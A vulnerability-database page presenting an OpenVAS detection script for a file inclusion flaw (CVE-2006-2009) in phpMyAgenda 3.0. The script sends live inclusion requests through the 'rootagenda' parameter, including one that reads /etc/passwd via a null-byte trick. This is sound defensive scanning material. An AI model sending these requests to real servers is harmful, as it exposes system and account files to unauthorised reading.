Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
openvasThis script is Copyright (C) 2006 Ferdy RiphagenOPENVAS:200002
HistoryAug 22, 2008 - 12:00 a.m.

phpMyAgenda version 3.0 File Inclusion Vulnerability

2008-08-2200:00:00
This script is Copyright (C) 2006 Ferdy Riphagen
plugins.openvas.org
24

0.252 Low

EPSS

Percentile

96.2%

JSON

The remote web server contains a PHP application that is prone to
remote and local file inclusions attacks.

Description :

phpMyAgenda is installed on the remote system. It’s an open source
event management system written in PHP.

The application does not sanitize the ‘rootagenda’ parameter in some
of it’s files. This allows an attacker to include arbitrary files from
remote systems and parse them with privileges of the account under
which the web server is started.

This vulnerability exists if PHP’s ‘register_globals’ & ‘magic_quotes_gpc’
are both enabled for the local file inclusions flaw.
And if ‘allow_url_fopen’ is also enabled remote file inclusions are also
possible.

# OpenVAS Vulnerability Test
# $Id: phpMyAgenda_30final_file_include.nasl 5780 2017-03-30 07:37:12Z cfi $
# Description: phpMyAgenda version 3.0 File Inclusion Vulnerability
#
# Authors:
# Ferdy Riphagen <f[dot]riphagen[at]nsec[dot]nl>
#
# Copyright:
# Copyright (C) 2006 Ferdy Riphagen
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "The remote web server contains a PHP application that is prone to
remote and local file inclusions attacks.

Description :

phpMyAgenda is installed on the remote system. It's an open source
event management system written in PHP.

The application does not sanitize the 'rootagenda' parameter in some
of it's files. This allows an attacker to include arbitrary files from 
remote systems and parse them with privileges of the account under
which the web server is started.

This vulnerability exists if PHP's 'register_globals' & 'magic_quotes_gpc'
are both enabled for the local file inclusions flaw. 
And if 'allow_url_fopen' is also enabled remote file inclusions are also
possible.";

tag_solution = "No patch information provided at this time.
Disable PHP's 'register_globals'";

# Original advisory / discovered by : 
# http://www.securityfocus.com/archive/1/431862/30/0/threaded

if (description)
{
 script_id(200002);
 script_version("$Revision: 5780 $");
 script_tag(name:"last_modification", value:"$Date: 2017-03-30 09:37:12 +0200 (Thu, 30 Mar 2017) $");
 script_tag(name:"creation_date", value:"2008-08-22 16:09:14 +0200 (Fri, 22 Aug 2008)");
 script_tag(name:"cvss_base", value:"7.5");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_cve_id("CVE-2006-2009");
 script_bugtraq_id(17670);
 script_name("phpMyAgenda version 3.0 File Inclusion Vulnerability");
 script_category(ACT_ATTACK);
 script_tag(name:"qod_type", value:"remote_vul");
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2006 Ferdy Riphagen");
 script_dependencies("find_service.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 script_xref(name : "URL" , value : "http://www.securityfocus.com/archive/1/431862/30/0/threaded");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

foreach dir( make_list_unique( "/phpmyagenda", "/agenda", cgi_dirs( port:port ) ) ) {

 if( dir == "/" ) dir = "";
 res = http_get_cache(item:string(dir, "/agenda.php3"), port:port);
 
 if(egrep(pattern:"<a href=[^?]+\?modeagenda=calendar", string:res)) {
  file[0] = string("http://", get_host_name(), dir, "/bugreport.txt");
  file[1] = "/etc/passwd";

  req = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[0], "%00"), port:port);
  recv = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
  if (recv == NULL) continue;

  if ("Bug report for phpMyAgenda" >< recv) {
   security_message(port:port);
   exit(0);
  }
  else { 
   # Maybe PHP's 'allow_url_fopen' is set to Off on the remote host.
   # In this case, try a local file inclusion.
   req2 = http_get(item:string(dir, "/infoevent.php3?rootagenda=", file[1], "%00"), port:port);
   recv2 = http_keepalive_send_recv(data:req2, bodyonly:TRUE, port:port);
   if (recv2 == NULL) continue;
  
   if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv2)) {
    # PHP's 'register_globals' and 'magic_quotes_gpc' are enabled on the remote host.
    security_message(port:port);
    exit(0);
   }
  }
 }
}

exit( 99 );

Related

nessus 1
openvas 1
cve 2
prion 1
nessus
nessus
phpMyAgenda rootagenda Parameter File Include Vulnerability
2006-05-03 00:00:00
openvas
openvas
phpMyAgenda 3.0 File Inclusion Vulnerability
2008-08-22 00:00:00
cve
cve
CVE-2006-2009
2006-04-25 12:50:00
CVE-2006-5132
2006-10-03 04:03:00
prion
prion
Remote file inclusion
2006-04-25 12:50:00

0.252 Low

EPSS

Percentile

96.2%

JSON
Related for OPENVAS:200002
nessus1openvas1cve2prion1